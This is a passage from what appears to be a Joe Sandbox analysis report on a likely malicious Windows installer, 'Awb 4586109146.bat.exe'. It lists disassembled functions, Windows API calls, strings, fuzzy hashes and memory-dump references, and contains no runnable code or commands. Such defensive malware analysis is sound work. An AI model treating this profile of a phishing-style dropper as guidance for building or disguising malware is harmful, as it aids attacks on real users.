Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID:
String ID: p!C$p!C
API String ID: 0-3125587631
Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
Instruction ID: 7c26ffe8835462b5285d43e9ad3b72979f058f3642fe5300250d3649f4ae0bba
Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
Instruction Fuzzy Hash: 9BC15831E04219DBDF18CF68C8905EEBBB2BF88314F25866AC85677380D734A942CF95

Function 00406B15 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
Instruction ID: 703def0becceeecb9d8561ea32c53bcab4b84ebc773a8a1d0b412cad538f794c
Opcode Fuzzy Hash: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
Instruction Fuzzy Hash: 1EE1797190470ADFDB24CF99C880BAAB7F5FF44305F15852EE497A7291E378AA91CB04

Function 004043F0 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,?), ref: 0040448E
GetDlgItem.USER32(?,000003E8), ref: 004044A2
SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 004044BF
GetSysColor.USER32(?), ref: 004044D0
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044DE
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044EC
lstrlenW.KERNEL32(?), ref: 004044F1
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044FE
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404513
GetDlgItem.USER32(?,0000040A), ref: 0040456C
SendMessageW.USER32(00000000), ref: 00404573
GetDlgItem.USER32(?,000003E8), ref: 0040459E
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045E1
LoadCursorW.USER32(00000000,00007F02), ref: 004045EF
SetCursor.USER32(00000000), ref: 004045F2
LoadCursorW.USER32(00000000,00007F00), ref: 0040460B
SetCursor.USER32(00000000), ref: 0040460E
SendMessageW.USER32(00000111,?,00000000), ref: 0040463D
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464F

Strings

N, xrefs: 0040458C
Call, xrefs: 004045CD
gC@, xrefs: 004045FA

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N$gC@
API String ID: 3103080414-2733886405
Opcode ID: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
Instruction ID: 67960cbe9d5dd80a83daf25f2437327cccbb0fafcef4e9f4d39b28ee92a42e65
Opcode Fuzzy Hash: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
Instruction Fuzzy Hash: ED618FB1900209BFDB109F60DD85EAA7B79FB84345F00853AF605B62D0D77DA951CFA8

Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,?), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,Footballer Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C
Footballer Setup, xrefs: 00401150

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$Footballer Setup
API String ID: 941294808-2802707411
Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4

Function 00405F06 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,004060A1,?,?), ref: 00405F41
GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F4A

Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57

GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F67
wsprintfA.USER32 ref: 00405F85
GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405FC0
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FCF
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406007
SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040605D
GlobalFree.KERNEL32(00000000), ref: 0040606E
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406075

Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Awb 4586109146.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6

Strings

[Rename], xrefs: 00405FEF, 00406001
%ls=%ls, xrefs: 00405F7B

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 19ce75182fe0bcfe9ef27c5950cf2d0ac50ba1a4511b366fbaff45796f309885
Instruction ID: 4536b0422d5dde00314373cba87b6dc9e05edcb010d47b65b9eea0f1bfd6f862
Opcode Fuzzy Hash: 19ce75182fe0bcfe9ef27c5950cf2d0ac50ba1a4511b366fbaff45796f309885
Instruction Fuzzy Hash: 5A313531641B04BBC220AB659D48F6B3AACEF45744F15003FFA46F62D2DB7C98118ABD

Function 0040654E Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",0040336A,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",0040336A,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",0040336A,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8

Strings

*?|<>/":, xrefs: 004065A0
"C:\Users\user\Desktop\Awb 4586109146.bat.exe", xrefs: 0040654E
C:\Users\user\AppData\Local\Temp\, xrefs: 0040654F, 00406554

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Awb 4586109146.bat.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3813581078
Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
Instruction ID: 36fae6fd7d65e337959ab81909abbfc549fe516cf0b4c9ff473ab524d2c4c229
Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
Instruction Fuzzy Hash: B611B65580061279DB302B14BC40EB762F8EF54764F56403FED86732C8EBBC5C9292AD

Function 00404298 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004042B5
GetSysColor.USER32(00000000), ref: 004042F3
SetTextColor.GDI32(?,00000000), ref: 004042FF
SetBkMode.GDI32(?,?), ref: 0040430B
GetSysColor.USER32(?), ref: 0040431E
SetBkColor.GDI32(?,?), ref: 0040432E
DeleteObject.GDI32(?), ref: 00404348
CreateBrushIndirect.GDI32(?), ref: 00404352

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction ID: a3c6a1d12b74a4a342abaca89036a15a37f51972f1e3113ed1cbee018e9c0b42
Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction Fuzzy Hash: 772156716007059BC724DF78D948B5B77F4AF81710B04893DED96A26E0D734E544CB54

Function 00404BEC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C07
GetMessagePos.USER32 ref: 00404C0F
ScreenToClient.USER32(?,?), ref: 00404C29
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C3B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C61

Strings

f, xrefs: 00404C3D

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: 457ccdd811883e010b73e4973708530e0d9e00004b69c5e73a61d7a3cd07de8f
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: CF015271900218BAEB10DBA4DD85BFEBBBCAF95711F10412BBA50B71D0D7B499018BA4

Function 00401DB9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401DBC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
ReleaseDC.USER32(?,00000000), ref: 00401DEF
CreateFontIndirectW.GDI32(0040CDD0), ref: 00401E3E

Strings

Calibri, xrefs: 00401E24

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Calibri
API String ID: 3808545654-1409258342
Opcode ID: f18babf6a3f54167651d4878a138e52fe532a855dc2a3d8ed9c0da916718800c
Instruction ID: ba082d56d8bf6e999078db2812661e05c0675f9cd89887cb5e118dc0f9610a58
Opcode Fuzzy Hash: f18babf6a3f54167651d4878a138e52fe532a855dc2a3d8ed9c0da916718800c
Instruction Fuzzy Hash: CF015E71944240EFE700ABB0AF4AAD97FB4AF55301F10457EE242F61E2DAB904458B2D

Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
MulDiv.KERNEL32(000C23A2,00000064,000C23A6), ref: 00402E3C
wsprintfW.USER32 ref: 00402E4C
SetWindowTextW.USER32(?,?), ref: 00402E5C
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E

Strings

verifying installer: %d%%, xrefs: 00402E46

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
Instruction ID: 97abdd23f95b89fa957f28f44bfdcbbe1494948371ff671501e6f707f2390605
Opcode Fuzzy Hash: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
Instruction Fuzzy Hash: B7014F7164020CBBEF209F60DE49FAA3B69AB04304F008439FA06B91E0DBB885558B98

Function 73962569 Relevance: 9.1, APIs: 6, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 7396121B: GlobalAlloc.KERNELBASE(00000040,?,7396123B,?,739612DF,00000019,739611BE,-000000A0), ref: 73961225

GlobalFree.KERNEL32(?), ref: 73962657
GlobalFree.KERNEL32(00000000), ref: 7396268C

Memory Dump Source

Source File: 00000000.00000002.3746698006.0000000073961000.00000020.00000001.01000000.00000006.sdmp, Offset: 73960000, based on PE: true

Associated: 00000000.00000002.3746632612.0000000073960000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.3746839235.0000000073964000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.3746909776.0000000073966000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73960000_Awb 4586109146.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: b2e17fb98df548167ae9262147f30d6befabe8d3f5474c129cc95af9751ea2bc
Instruction ID: eb8bbe19825abbdaab35f39707d6c03bb38f9f15acd61c500de86bae742503bd
Opcode Fuzzy Hash: b2e17fb98df548167ae9262147f30d6befabe8d3f5474c129cc95af9751ea2bc
Instruction Fuzzy Hash: 7D31037210B519EFDB16AF91C894FAA77BAFB85344324453EF5868F260C7309815CB63

Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
GlobalFree.KERNEL32(?), ref: 00402956
GlobalFree.KERNEL32(00000000), ref: 00402969
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995

